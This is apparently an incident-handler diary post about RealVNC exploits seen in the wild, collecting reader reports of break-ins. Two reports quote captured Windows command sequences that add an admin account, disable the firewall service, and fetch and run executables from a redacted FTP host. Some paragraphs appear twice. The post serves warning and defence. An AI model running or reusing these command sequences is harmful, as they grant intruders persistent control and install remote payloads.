RealVNC exploits in the wild
Active use of RealVNC to break into systems is being reported to us.
If you can share more details or just can report attempts, please let us know.
If you have any RealVNC exposed, check if you are hacked, and if not take measures immediately. If you want an inherently more secure solution check how to run vnc over ssh on your specific platform.
See more of the vulnerability in the May 15th diary by Kyle Haugsness.
[updates below]
List of exploits reported to us by our readers:
It sure looks like these machines are slowly getting owned one by one ...
--
Swa Frantzen -- Section 66
If you can share more details or just can report attempts, please let us know.
If you have any RealVNC exposed, check if you are hacked, and if not take measures immediately. If you want an inherently more secure solution check how to run vnc over ssh on your specific platform.
See more of the vulnerability in the May 15th diary by Kyle Haugsness.
[updates below]
List of exploits reported to us by our readers:
- Austin from the UK reports that all shared printers in his office stated to print:
Dear Network Administrator.
Please do not be alarmed.
My team is network security specialist.
You are using a vulnerable version of VNC.
Please upgrade your version soon.
We have not accessed your data but we could have.
Have a nice day
The intrusion reportedly happened on a workstation where a visitor left a VNC server running.
He notes that "RealVNC logs all connection IP addresses in the event manager which some people didn't know".
He notes that "RealVNC logs all connection IP addresses in the event manager which some people didn't know".
- An Anonymous report about the installation of typical tools installed by the warez and hacker crowd such as Serv-U and pwdump.
- Mike reported on a machine getting hacked and sent us what his IDS caught of it:
net user [user] [pass] /ADD
net localgroup Administrators [user] /ADD
net stop sharedaccess
sc delete sharedaccess
echo open [IP] [port] > ftptmp
echo user [ftpuserinfo] >> ftptmp
echo get usercontrol.exe >> ftptmp
echo get helpservice.svc >> ftptmp
echo get JAcheck.ini >> ftptmp
echo get JAcheck.dll >> ftptmp
echo bye >> ftptmp
ftp -n -s:ftptmp
del ftptmp
usercontrol /i
net start "ms system service"
Analysis by fellow handler Scott indicated that it adds a user with admin rights, and installs what looks like Serv-U on the machine. Perhaps more happened earlier, happens later, or just was not caught.
- An anonymous user reports: "We have been using RealVNC 4.1.1 and have been experiencing successful unauthorized connections to our machines. Also, we have seen increased traffic on our network which looks like scanning, some network printers have also been printing pages of gibberish." He concluded with "We are currently upgrading all VNC servers to 4.1.2."
- Another anonymously reported attack that was done on port 5900 (also an IDS capture), so the RealVNC angle is only an assumption at this point:
cd %WINDIR%\system32
echo open [IP] [PORT] >>ms32
echo [user] >>ms32
echo [pass] >>ms32
echo get pack.exe>>ms32
echo get Iass.exe>>ms32
echo get mssd.ini>>ms32
echo get fport.exe>>ms32
echo get op.exe>>ms32
echo get pskill.exe>>ms32
echo bye>>ms32
ftp -v -s:ms32
Iass.exe /I
ipconfig
net start dnsd
pack.exe
--
Swa Frantzen -- Section 66
Keywords:
0 comment(s)
×
Diary Archives
Comments